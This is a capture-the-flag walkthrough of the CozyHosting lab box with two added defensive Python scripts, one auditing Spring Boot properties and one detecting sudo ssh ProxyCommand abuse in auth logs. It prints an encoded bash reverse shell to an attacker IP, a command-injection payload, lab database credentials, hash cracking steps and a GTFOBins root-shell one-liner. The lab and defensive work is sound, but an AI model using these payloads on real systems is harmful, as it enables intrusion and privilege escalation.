> [!info] Open Ports
> SSH (22) ver: OpenSSH 8.9p1
> HTTP (80) ver: nginx 1.18.0

## Directory Enum

**Interesting directories**

- `http://cozyhosting.htb/actuator/`
- `http://cozyhosting.htb/actuator/sessions` - shows hashed cookie values for kanderson and unauthorized.
- Manipulation of these cookie values allows access to the admin page, where there is an SSH form.

## 1st RevShell

![[CHburpRevShell.png]]

Bash -i revshell, base64 encoded, then URL encoded. We need the URL without whitespace, so adding `${IFS}` to the beginning makes this work.

> [!info] Reverse Shell Process
> `bash -i >& /dev/tcp/10.10.14.143/4444 0>&1`
> Then... Base64 encode:
> `YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xNDMvNDQ0NCAwPiYx`
> Then... URL encode while adding `echo${IFS}` and `${IFS}`:
> `;echo${IFS}"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xNDMvNDQ0NCAwPiYx"|base64${IFS}-d|bash`

You then catch a revshell once you send this request, either from the newly accessed web page or from Repeater in Burp Suite. I would suggest Repeater in Burp Suite, as you can see the response if there are any errors; for example, I had to fiddle with the `$IFS` placement as well as the semicolons.

### Investigation as APP

The directory we are dropped into is `/app`. In here there is a .JAR file called `cloudhosting-0.0.1.jar`. Moving this over to our machine for a closer look (`python3 -m http.server 4545`), I viewed the contents with a package called "jd-gui".

In `BOOT.INF/classes/application.properties` we find a ton of helpful information about the PostgreSQL server.
```
server.address=127.0.0.1
server.servlet.session.timeout=5m
management.endpoints.web.exposure.include=health,beans,env,sessions,mappings
management.endpoint.sessions.enabled = true
spring.datasource.driver-class-name=org.postgresql.Driver
spring.jpa.database-platform=org.hibernate.dialect.PostgreSQLDialect
spring.jpa.hibernate.ddl-auto=none
spring.jpa.database=POSTGRESQL
spring.datasource.platform=postgres
spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=postgres
spring.datasource.password=Vg&nvzAQ7XxR
```

As well as, in `BOOT.INF/classes/htb.cloudhosting/scheduled/FakeUser.class`, the line:

```java
Runtime.getRuntime().exec(new String[] { "curl", "localhost:8080/login", "--request", "POST", "--header", "Content-Type: application/x-www-form-urlencoded", "--data-raw", "username=kanderson&password=MRdEQuv6~6P9", "-v" });
```

The FakeUser seems like a rabbit hole so I didn't investigate further; however, the psql credentials are extremely helpful. I used them by...

**On the revshell (app)**

`psql -h 127.0.0.1 -U postgres` (credentials from above)

Once logged in we can see the available databases with `\list`

![[CHpsqlDB.png]]

Switching to the cozyhosting DB: `\c cozyhosting`

We can then see another list of relations with `\d`

![[CHpsqlRel.png]]

Let's see what is in users...

![[CHpsqlUsr.png]]

BOOM! We found some hashed passwords. From the jar file we know kanderson is part of FakeUser.class, so we can ignore that.

Writing the admin pw to a file and then running hashcat (`-m 3200` is bcrypt):

`hashcat -a 0 -m 3200 psqlAdmin /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt`

Hashcat cracks it and outputs: manchesterunited

Back on the victim, we run `cat /etc/passwd` to get a list of possible users to try this password on.

```
josh:x:1003:1003::/home/josh:/usr/bin/bash
_laurel:x:998:998::/var/log/laurel:/bin/false
```

`_laurel` does not have a shell to log in to, so let's try josh: `su - josh`

Once logged in we can exfiltrate the user flag.
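Two of the weaknesses that carried this box live in the `application.properties` above: Actuator endpoints (`sessions`, `env`, `beans`, `mappings`) exposed over the web, and a plaintext datasource password baked into the JAR. The following script is an added example (not part of this write-up or the CozyHosting app) that parses a `.properties` file and flags both; the sample properties are constructed to mirror the recovered file, with a placeholder in place of the real password, and the list of "sensitive" endpoints is my own choice.

```python
"""Audit a Spring Boot application.properties for exposed Actuator endpoints
and plaintext credentials. Added example; constructed sample input below."""

# Actuator endpoints that hand out session IDs, environment, beans or
# request mappings to anyone who can reach them. This is my own list.
SENSITIVE_ENDPOINTS = {
    "sessions", "env", "beans", "mappings", "configprops",
    "heapdump", "threaddump", "loggers",
}

# Constructed to mirror the properties recovered from the JAR (password replaced).
SAMPLE_PROPERTIES = """\
server.address=127.0.0.1
server.servlet.session.timeout=5m
management.endpoints.web.exposure.include=health,beans,env,sessions,mappings
management.endpoint.sessions.enabled = true
spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=postgres
spring.datasource.password=changeme-placeholder
"""

# Same file with the weak settings corrected (constructed).
HARDENED_PROPERTIES = """\
server.address=127.0.0.1
management.endpoints.web.exposure.include=health
spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=${DB_USER}
spring.datasource.password=${DB_PASSWORD}
"""


def parse_properties(text):
    """Minimal .properties parser: '=' or ':' separator, '#'/'!' comments,
    whitespace around the separator stripped (so 'enabled = true' parses)."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#!":
            continue
        # Split on whichever separator appears first ('=' before the ':' in a JDBC URL).
        idx = min((line.find(s) for s in "=:" if s in line), default=-1)
        if idx < 0:
            props[line] = ""
            continue
        props[line[:idx].strip()] = line[idx + 1:].strip()
    return props


def audit_properties(text):
    """Return a list of human-readable findings; an empty list means nothing flagged."""
    props = parse_properties(text)
    findings = []
    raw = props.get("management.endpoints.web.exposure.include", "")
    exposed = {e.strip() for e in raw.split(",") if e.strip()}
    if "*" in exposed:
        findings.append("actuator: all endpoints exposed over web ('*')")
    for ep in sorted(exposed & SENSITIVE_ENDPOINTS):
        findings.append(f"actuator: sensitive endpoint '{ep}' exposed over web")
    if (props.get("management.endpoint.sessions.enabled", "").lower() == "true"
            and "sessions" in exposed):
        findings.append("actuator: sessions endpoint enabled and exposed; session IDs readable")
    for key, value in props.items():
        # A literal password is a finding; a ${VAR} reference resolved at runtime is not.
        if key.endswith(".password") and value and not value.startswith("${"):
            findings.append(f"credential: '{key}' holds a plaintext value (use ${{VAR}} or a vault)")
    return findings


if __name__ == "__main__":
    for name, text in (("recovered", SAMPLE_PROPERTIES), ("hardened", HARDENED_PROPERTIES)):
        print(f"== {name} ==")
        for f in audit_properties(text) or ["no findings"]:
            print(" -", f)
```

Run against the recovered file it reports the four sensitive endpoints, the enabled-and-exposed sessions endpoint and the plaintext password; the hardened variant, which exposes only `health` and pulls credentials from the environment, produces no findings.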
## Priv ESC

SUID binary search yielded nothing useful; however, `sudo -l` showed that SSH could be run with sudo. This sparked my memory of a site called GTFOBins: [ssh | GTFOBins](https://gtfobins.github.io/gtfobins/ssh/)

At the bottom... IF we can run ssh as sudo (which we can):

`sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x`

Once run, we are dropped into a root shell and can exfiltrate the root flag!

# Lessons Learned

1) How SQL queries work <-- Learn MORE
2) Basic PostgreSQL usage <-- Learn MORE
3) GTFOBins
4) A whole ton of hash cracking
5) I think I need to find a better web directory brute forcing list.
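On the defensive side of the Priv ESC section above: a sudoers rule for `ssh` is root for the asking, because `ProxyCommand` (and `LocalCommand`) run a local command as the invoking user, here root. sudo logs every invocation with the full command line, so the abuse is easy to spot. The script below is an added example (not from this write-up) that parses sudo entries in `auth.log` format and alerts on `ssh` launched via sudo with either of those options; the log lines are constructed, and the hostname and timestamps are made up.

```python
"""Detect sudo-launched ssh with a command-executing option (ProxyCommand /
LocalCommand). Added example; the log lines below are constructed."""
import re

# Constructed in the layout sudo writes to /var/log/auth.log.
SAMPLE_AUTH_LOG = """\
Sep 12 10:01:02 cozyhosting sudo:     josh : TTY=pts/0 ; PWD=/home/josh ; USER=root ; COMMAND=/usr/bin/ssh -o ProxyCommand=;sh 0<&2 1>&2 x
Sep 12 10:03:15 cozyhosting sudo:     josh : TTY=pts/0 ; PWD=/home/josh ; USER=root ; COMMAND=/usr/bin/ssh backup@10.0.0.5
Sep 12 10:04:00 cozyhosting sudo:    alice : TTY=pts/1 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/apt update
Sep 12 10:05:30 cozyhosting sshd[1234]: Accepted publickey for josh from 10.0.0.9 port 51234 ssh2
"""

# user : TTY=... ; PWD=... ; USER=target ; COMMAND=<argv>
SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+)\s+:\s+.*?USER=(?P<target>\S+)\s+;\s+COMMAND=(?P<cmd>.*)$"
)
# ssh options whose value is executed locally by the ssh process.
SHELL_OPTS = re.compile(r"-o\s*(ProxyCommand|LocalCommand)\s*=", re.IGNORECASE)


def parse_sudo_line(line):
    """Return {'user', 'target', 'cmd'} for a sudo log entry, else None."""
    m = SUDO_RE.search(line)
    return m.groupdict() if m else None


def detect_sudo_ssh_abuse(log_text):
    """Scan auth.log text; return one alert dict per sudo'd ssh carrying a
    ProxyCommand/LocalCommand option. Plain sudo ssh sessions are not alerted."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_sudo_line(line)
        if not rec:
            continue
        argv = rec["cmd"].split()
        if not argv or argv[0].rsplit("/", 1)[-1] != "ssh":
            continue
        m = SHELL_OPTS.search(rec["cmd"])
        if m:
            alerts.append({"user": rec["user"], "target": rec["target"],
                           "option": m.group(1), "cmd": rec["cmd"]})
    return alerts


if __name__ == "__main__":
    for a in detect_sudo_ssh_abuse(SAMPLE_AUTH_LOG):
        print(f"ALERT {a['user']} -> {a['target']} via ssh {a['option']}: {a['cmd']}")
```

Only the first line fires; the ordinary `sudo ssh backup@...` session and the sshd entry are ignored. The real fix is upstream of detection: do not grant `ssh` in sudoers at all, or at least restrict the rule to a fixed argument list, since any binary on GTFOBins turns a "harmless" sudo rule into a root shell.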